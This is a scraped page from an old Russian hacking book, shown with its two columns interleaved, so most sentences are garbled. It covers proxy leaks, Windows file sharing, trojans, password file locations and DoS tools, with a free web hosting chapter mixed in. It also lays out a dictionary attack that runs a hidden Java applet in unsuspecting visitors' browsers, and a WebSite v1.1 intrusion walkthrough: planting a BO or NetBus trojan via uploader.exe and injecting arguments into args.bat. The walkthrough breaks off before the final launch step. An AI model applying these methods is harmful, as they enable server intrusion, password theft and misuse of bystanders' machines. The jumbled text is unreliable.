Далеко не все прокси серверы являются полностью анонимными.

Доступ к компьютеру Некоторые из них позволяют администратору сайта, который вы посе Примерно к четверти или трети всех компьютеров под Windows щаете с использованием прокси, при желании определить IP адрес, с ко в сети можно получить доступ за пару минут. Этот печальный факт объ торого происходит обращение к прокси, т.е. ваш реальный IP адрес.

ясняется тем, что сами пользователи (или глупые системные админи Если вы получите сообщение Proxy server is detected! — ваш прокси страторы) конфигурирую компьютер таким образом, что его папки или имеет «дыру», и вам будет предоставлена информация о вашем реальном целые диски становятся доступными для чтения и записи с удаленных Хакерские трюки 265 266 Хакерские трюки компьютеров. Формально это называется File and Print Sharing. Если вы пароли. Имейте также в виду, что существует возможность «взобраться щелкнете по иконке Network в Control Panel, то увидите эту кнопку. И ес вверх по дереву», то есть если на диске C: есть папка SomeStuff с откры ли флажок I want to be able to give others access to my files включен, то сто тым доступом, то до корня C: тоже могут добраться. Ну, а вообще ит задуматься. Windows 95/98 — операционная система слабо защищенная, и никакой гарантии безопасности дать, увы, не может.

Почему пользователи дают доступ к своим файлам — наверное, понятно. Самая распространенная ситуация — в доме два компьютера, В качестве развлекательной программы можно установить соединенных в маленькую сеть. Скрывать друг от друга нечего, поэтому NetWatcherPro (245K, freeware), которая включает сирену каждый раз, дается свободный доступ сразу ко всему. Или человеку нужно переписать когда кто то ломится в компьютер. При этом показывается IP адрес ата данные с десктопа на ноутбук. Или в небольшой фирме стоит локальная кующего и те файлы и папки, которые визитер просматривает. Очень по сеть. Или вы просто любите на разные незнакомые кнопки нажимать... знавательно! Если доступ хотя бы к одной папке открыт, сирену будете Ну, а где доступ с соседнего компьютера, там и доступ из Internet. слышать, как минимум, раз в час.

Остановимся на том, к чему могут привести путешествия других А кони все скачут и скачут...

людей по вашим дискам и как этого избежать. Во первых, у вас могут ук Какие кони? Троянские! Троянцами называют программы, кото расть приватную информацию, что крайне неприятно. Файлы могут так рые, на первый взгляд, выполняют некие полезные функции, но на са же вообще стереть, что, пожалуй, еще неприятнее.

мом деле либо разрушают систему, либо отдают контроль в руки другого Но, как правило, крадут другое, особенно если крадут русские: па человека. Пород троянцев множество: некоторые из них вообще не вы роли. Особенности национального менталитета («Халява!») приводят к полняют полезных функций, а просто скрытно «живут» на диске и дела тому, что масса малолетних бездельников только и занимается тем, что ют разные гадости, а некоторые, наоборот, совершенно не скрываются крадет пароли доступа к Internet с чужих компьютеров, благо устройство от пользователя, при этом производя некоторые манипуляции, о кото Windows 95/98 и большинства программ к этому располагает.

рых никто не подозревает (или не должен подозревать). Пример первой породы — всем известный Back Orifice, дающий врагу почти полный Пароли хранятся просто по всему диску, обычно в слабозашифро контроль над вашим компьютером и для вас невидимый. Пример второй ванном виде. Dial Up пароли — в файлах.PWL, почтовые пароли к породы — MS Internet Explorer, который при соединении с сайтом Outlook — в реестре, к Eudora — в eudora.ini, к FTP сайтам (включаю ва MicroSoft развивает совершенно бешеную активность по пересылке дан шу персональную страничку) — в разных файлах FTP клиентов, пароли ных с компьютера на сервер, объем которых явно превосходит простой Windows NT — в файлах SAM, и т.д., и т.п. Появилось множество про запрос HTML документа.

грамм, которые способны эти пароли извлекать, и целые коллекции та ких программ, например на сайте Russian Password Crackers есть несколь Попасть троянец на компьютер может двумя основными способа ко программ для работы с.PWL файлами. Так что пусть звездочки в окне ми: либо вам его «положат» на диск, либо вы его сами себе скачаете.

ввода пароля вас не обнадеживают, а вот свободный доступ к файлам Множество людей получают подобные программы себе на диск своего компьютера лучше ограничить.

каждый день. Не стоит скачивать программы с неизвестных сайтов, под Как это сделать? Windows 95/98 и Windows NT по разному обеспе давшись на обещания авторов дать вам «сУпЕр КрУТУю МочИлкУ чивают удаленный доступ. В первом случае, как правило, используется против /\аммер0в» или классный вьюер для бесплатной порнухи. Не на share access control (доступ на основании только пароля), во втором — до также открывать attachments, пришедшие с почтой от незнакомых user access control (на основании пары имя пароль).

людей.

Для пользователей Windows 95/98 самое простое решение — от В ваше отсутствие какая нибудь добрая душа может просто пере ключить File and Print Sharing, если он вам уже не нужен. Можно также писать троянца на компьютер с дискеты (не оставляйте компьютеры без убрать привязку File and Print Sharing к протоколу TCP/IP (Control присмотра!). Кроме того, троянца могут положить из сети прямо на диск, Panel Network TCP/IP Properties Bindings), что эффективно за пока вы, ничего не подозревая, мило беседуете в IRC или гуляете по сай блокирует доступ к общим ресурсам из Internet. Если же доступ нужен, то ту Netscape.

ставьте пароли на общие папки и диски, причем, желательно, сложные Хакерские трюки 267 268 Хакерские трюки Некоторых, особенно распространенных троянцев способны об рерасход. В противном случае робот угрожает произвольно стереть все, наруживать антивирусные программы, например, AntiViral Toolkit Pro. что выходит, скажем, за 1 МБ.

Имейте в виду, что всех троянцев ни одна программа обнаружить не мо Что делать? Сокращать — жалко, платить — накладно (обычно это жет, и можно спокойно рассмеяться в лицо тому производителю софта, существенно больше, чем вы платите за доступ). Тут то и приходит вре который пытается убедить вас в обратном.

мя обратиться к серверам, обеспечивающим так называемый бесплат ный хостинг web страниц.

Технические атаки На первое место претендует Virtual Avenue. Достоинства — боль На самом деле, термин «Технические атаки» не очень точен. Все шой (хотя и не максимальный, но у многих ли сайты превышают 20 МБ) атаки, по сути, технические. Здесь имеются в виду атаки из сети, направ объем, как бы настоящий домен третьего уровня, быстрая и (почти) ус ленные на технический вывод из строя компьютера, как правило, на ко тойчивая работа. Реклама — не очень навязчива, хотя можно бы и попро роткое время, нужное для перезагрузки. По английски такие атаки на ще. Но бесплатно всегда приходится выбирать между плохим и очень зываются Denial of service (DOS) attacks. К privacy это прямого отношения плохим. Впрочем, за деньги нередко тоже.

не имеет, но раз уж зашел разговор об атаках, то упомянем и о них.

Второе место за XOOM. Одиннадцати МБ в большинстве случаев Симптомы «болезни» таковы: неожиданно компьютер, подклю хватает для среднего сайта. Реклама — предельно ненавязчивая. Про ченный к сети, зависает, либо появляется голубой «экран смерти» — со грамм для автоматической замены и вставки можно найти в Сети сколь общение об ошибке. Лечение простое — Alt Ctrl Del.

ко угодно (например, http://freeware.ru или http://listsoft.ru). Не всегда Инструментарий для таких атак водится в сети в большом количе стабильно? — Так ведь халява, сэр. Этим грешат и коммерческие провай стве, не меньше и недоумков, которые получают наслаждение от того, деры.

что заваливают чей то компьютер. Самый известный представитель Третье место поделили между собой Webjump и SpacePort. В поль славного семейства — Winnuke, уложивший в свое время миллионы ком зу первого — 25 МБ и домен третьего уровня. Против — не очень изящ пьютеров под управлением Windows. Менее известны bonk, smurf, ping of ное решение рекламной проблемы и не очень стабильная работа. За death... нет им числа. Почти от всех подобных атак можно защититься, второй — неограниченный (если, конечно, его действительно можно по регулярно скачивая патчи с сайта MicroSoft.

лучить) объем и быстрая и стабильная работа. Против — pop up и не луч шая система адресации. Но в целом и тот, и другой — вполне приемлемое решение.

Глава 28.

Прочие имеющиеся — рекомендовать трудно. Cyber Sities накла В поисках халявного Web хостинга дывает слишком большие ограничения на содержание. NeoCerf прекра Итак, вы разработали дизайн своего сайта и насытили его тил оказывать бесплатные услуги. У RoyaltyStudios уж очень сложная ре содержанием. Следующий вопрос — где все это размещать? На первый гистрация.

взгляд, ответ очевиден: подавляющее большинство провайдеров предо ставляет своим клиентам некий бесплатный (вернее, уже оплаченный Глава 29.

абонентским или повременным тарифом) объем дискового простран ства. Обычно он колеблется от 256 КБ до 1 МБ. Для начала здесь и разме Некоторые аспекты атаки по словарю стимся. Ведь мегабайт — это много, особенно если графика оптимизиро вана, тексты выверены и отредактированы.

Всем известна старая атака по словарю. А также ее дополнение (имеется в виду атака с нескольких машин). В общем случае это выглядит Однако аппетит приходит во время еды. Появляются все новые так:

и новые интересные ссылки, растет объем графики. А затем хочется по пробовать и RealVideo, и дать звуковое сопровождение. И в один не Клиент (Crk client) обращается к серверу (Crk server) очень прекрасный день вы получаете уведомление, что бесплатный ли за очередной порцией паролей.

мит исчерпан, и предлагается либо сократить объем, либо платить за пе Хакерские трюки 269 270 Хакерские трюки Crk server помечает эту порцию как находящуюся в работе. удаляем из TMP эту порцию. Когда одновременно работают несколько клиентов, может возникнуть проблема. Но «свою» порцию можно найти, Crk client пробует все пароли из этой порции. Если один используя команду:

из них подошел, отправляется сообщение на Crk server POP3 TOP msg n и на этом заканчиваем перебор. Если нет, то Crk client отсылает на Crk server сообщение об окончании перебора Если Crk client не доработал из за ошибки, то эта порция не поте и берет новую порцию. Если соединение разрывается по ряется и ее можно переместить из TMP в WordList. Делать это придется ошибке или Crk client завис, то он, естественно, ничего не или вручную (что нежелательно), или возложить эту функцию на отправляет. Crk client. Тут возникает еще одна проблема, как отличить в TMP пор ции, которые обрабатываются сейчас, от тех, которые надо переместить Crk server получает сообщение об окончании перебора, в WordList. Для этого нужно анализировать дату отправки порции и теку тогда эта порция удаляется как уже обработанная. Или по щее время. Если разница порядка часа, то эту порцию перемещаем time out Crk server помечает эту порцию как в WordList.

необработанную.

Скорость перебора зависит от качества связи с сервером и от коли Рассмотрим, например, chat.ru (сервер). Он предоставляет следу чества посетителей Web странички.

ющие виды сервиса:

Теперь немного о применении вышеописанного. На первый Размещение страниц.

взгляд, может показаться, что это работает только для халявных серве ров, но это не так. Это работает и для серверов провайдеров, если только Почту (как POP3, так и SMTP).

HTTP, POP3 и SMTP обслуживаются одной машиной.

Рассмотрим, как можно организовать перебор пароля на любой сервис данного сервера. С некоторыми изменениями этот алгоритм можно использовать для серверов, которые предоставляют только HTTP. Правда, для этого Crk client можно написать в виде апплета на яве и положить ап сервер должен поддерживать методы DELETE и PUT, ну, и GET, есте плет на сервер. Это делается для того, чтобы перебором паролей занима ственно.

лись посетители Web страницы (даже не подозревая об этом). В логах сервера перебор будет разнесен во времени и пространстве, т.е. попытки будут происходить через неравные промежутки времени и из разных Глава 30.

мест. И к тому же невозможно будет определить, кто же в действительно Взлом WWW серверов сти подбирает пароль.

Этот апплет может коннектиться только с тем сервером, откуда он Взлом осуществляется через стандартные примеры, идущие в по был загружен (chat.ru). Нам это и нужно.

ставке с web сервером, а так как люди еще не сильно задумываются о за щите своего сайта, считая это не очень большой проблемой, и часто ос Проблема в следующем: как разместить на сервере Crk server?

тавляют все на Авось, то просто ставят WebSite, ничего не Очевидно, что это не получится. Покажем, как можно обойтись без предпринимая для его настройки и обеспечения достаточной защиты.

Crk server'а...

Все имеющиеся в сети сайты под управлением WebSite v1.1 имеют ла Регистрируем два аккаунта (WordList и TMP) на сервере, размеща зейку, обеспечивающую почти полный доступ к машине, на которой ем HTML страничку с апплетом Crk client, а словарь кладем в почтовый они находятся.

ящик (WordList) на сервере. Словарь необходимо разбить на порции, на Как у нас ставят WebSite? Просто давят кнопку Install, и потом пример по 20 паролей. При этом каждая порция лежит отдельным пись прога говорит, что web сервер поставлен. Люди находят, где находится мом. Crk client при запуске обращается на WordList по протоколу POP3 и корень web сайта, закачивают туда свою информацию, и все так и живет, берет первое же письмо (удаляя его с WordList, но отсылая его по SMTP пока не наступает время «дельта Тэ».

на TMP). Далее Crk client начинает перебор. Если пароль успешно най ден, отправляем его по SMTP себе. Если перебор завершился впустую, Хакерские трюки 271 272 Хакерские трюки Что же появляется в таком состоянии? По умолчанию отображает Мы можем засылать специальные непечатные символы типа CR ся (мапится, mapping) куча ненужных для работы сервера каталогов (код 0dh), LF (код 0ah). Появление таких символов в командной строке /java/, /publish/, /wsdocs/, /cgi dos/, /cgi win/. Конечно, в какой то мо приведет к переводу строки в скрипте и вполне возможно, что следую мент времени они, возможно, и понадобятся, но вначале они просто не щей строчкой вдруг ни с того ни с сего окажется наш файл, лежащий в нужны. Это с одной стороны, с другой стороны создателям WebSite со каталоге /uploads/.

всех сторон нужно показать возможности этого сервера, что они с успе Рассмотрим, как запускаются.bat скрипты на web сервере на ос хом и делают, открывая потенциальные дырки в защите web сайта и за нове WebSite.

полняя эти каталоги разнообразными примерами, так радующими глаз потенциального взломщика.

При обработке bat скрипта во временном каталоге WebSite/cgi temp/ создаются 4 файла: xxxxx.acc, xxxxx.bat, xxxxx.inp, Поставим на машину WebSite v1.1f в дефолтовой конфигурации xxxxx.out. В глаза сразу бросается файл xxxxx.bat. Так, при удаленном и приступим к исследованию его на дырки.

запуске /cgi dos/args.bat получается такой файл xxxxx.bat:

Задача перед нами стоит такая: закачать на ломаемый сервер ка @ECHO OFF&&TITLE WebSite CGI кое нибудь средство удаленного администрирования и управления, типа D:\WebSite\cgi dos\args.bat ВО или NetBus, и запустить его. Этап закачки не представляет никакого D:\WebSite\cgi temp\xxxxx.out интереса, т.к. по умолчанию WebSite позволяет удаленно запустить /cgi Если этому.bat файлу кинуть в командной строке аргументов, на win/uploader.exe и закачать кому угодно что угодно.

пример, /cgi dos/args.bat?africa.bat, то получим xxxxx.bat:

Вторым этапом является выяснение месторасположения каталога @ECHO OFF&&TITLE WebSite CGI с WebSite'ом. Это делается тоже очень легко, просто удаленно запускаем D:\WebSite\cgi dos\args.bat africa.bat файл /cgi dos/args.bat, на что нам в ответ приходит сообщение типа:

D:\WebSite\cgi temp\xxxxx.out Empty output from CGI program Кто знает, что такое перенаправление потока данных (значки D:/WebSite/cgi dos/args.bat > и <), сразу поймет, что здесь к чему. По простому, WebSite создает вре что однозначно определяет каталог с WebSite'ом. Тогда отобража менный xxxx.bat файл, результаты деятельности которого перенаправля емый каталог /cgi dos/ будет находится в каталоге D:/WebSite/cgi dos/, ются в файл xxxxx.out. Этот файл xxxxx.out отдается удаленному клиенту а путь к файлу Patch.exe, который мы закачиваем, будет: результатом работы скрипта, если в работе скрипта не произошло ошиб ки. Во временных файлах вместо символов xxxxx подставляется случай D:/WebSite/UploadS/Patch.exe ная последовательность символов.

Итак, момент, к которому мы подошли, — это исследование на предмет возможности запуска файла, который мы закачали. Например, у Запускаем вот так:

Pages:     | 1 |   ...   | 2 | 3 || 5 |



© 2011 www.dissers.ru - «Бесплатная электронная библиотека»

Материалы этого сайта размещены для ознакомления, все права принадлежат их авторам.
Если Вы не согласны с тем, что Ваш материал размещён на этом сайте, пожалуйста, напишите нам, мы в течении 1-2 рабочих дней удалим его.